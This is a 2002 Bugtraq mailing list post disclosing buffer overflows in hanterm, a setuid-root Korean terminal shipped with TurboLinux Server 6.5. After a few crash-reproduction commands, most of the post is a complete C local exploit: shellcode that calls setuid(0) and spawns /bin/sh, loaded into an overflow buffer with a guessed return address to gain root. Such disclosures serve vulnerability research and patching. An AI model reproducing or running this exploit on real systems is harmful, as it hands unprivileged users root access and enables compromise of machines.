Bugtraq mailing list archives
Overflow Vulnerabilities in hanterm
From: xperc <xperc () hotmail com>
Date: 7 Feb 2002 10:33:27 -0000
Hi,I'm xperc. hanterm is Hangul terminal for X. it is based on the xterm in XFree86. The hanterm binary is default installed with setuid root permissions for TurboLinux Server 6.5. but contains insecure code with allows unprivileged local users to obtain root access on the local system. $which hanterm /usr/bin/X11/hanterm $ls -l /usr/bin/X11/hanterm -rws--x--x 1 root root 166100 03 13 2001 /usr/bin/X11/hanterm* $rpm -qf /usr/bin/X11/hanterm hanterm-xf-p18-3.3-6 $hanterm -fn `perl -e 'print "a"x100'` Segmentation fault $hanterm -hfb `perl -e 'print "a"x8000'` Segmentation fault $hanterm -hfn `perl -e 'print "a"x8000'` Segmentation fault ...etc /* hanterm_exp.c * * local exploit for hanterm * .. tested in TurboLinux Server 6.5 (Japan) * * thanks my Japanese friend kaju(kaijyu) * and Japanese hacker UNYUN. * * by xperc () hotmail com * 2002/02/07 */ #include <stdio.h> #define NOP 0x90 #define MAXBUF 88 #define RETOFS 84 #define SHELL_OFS 22 #define ESP_OFS -0xe38 unsigned int get_esp() { __asm__("mov %esp,%eax"); } int main() { static char shellcode[]={ 0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80, 0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80, 0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0, 0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b, 0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c, 0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f, 0x62,0x69,0x6e,0x2f,0x73,0x68,0x00 }; unsigned int retadr; char buf[MAXBUF]; int i; memset(buf,NOP,MAXBUF); retadr=get_esp()+ESP_OFS; printf("Jumping address = %p\n",retadr); for(i=RETOFS-32;i<RETOFS+32;i+=4){ buf[i] =retadr&0xff; buf[i+1]=(retadr>>8)&0xff; buf[i+2]=(retadr>>16)&0xff; buf[i+3]=(retadr>>24)&0xff; } strncpy(buf+SHELL_OFS,shellcode,strlen (shellcode)); //buf[MAXBUF-1]='\0'; faint!:-( execl("/usr/bin/X11/hanterm","hanterm","- fn",buf,(char *)0); }
Current thread:
- Overflow Vulnerabilities in hanterm xperc (Feb 07)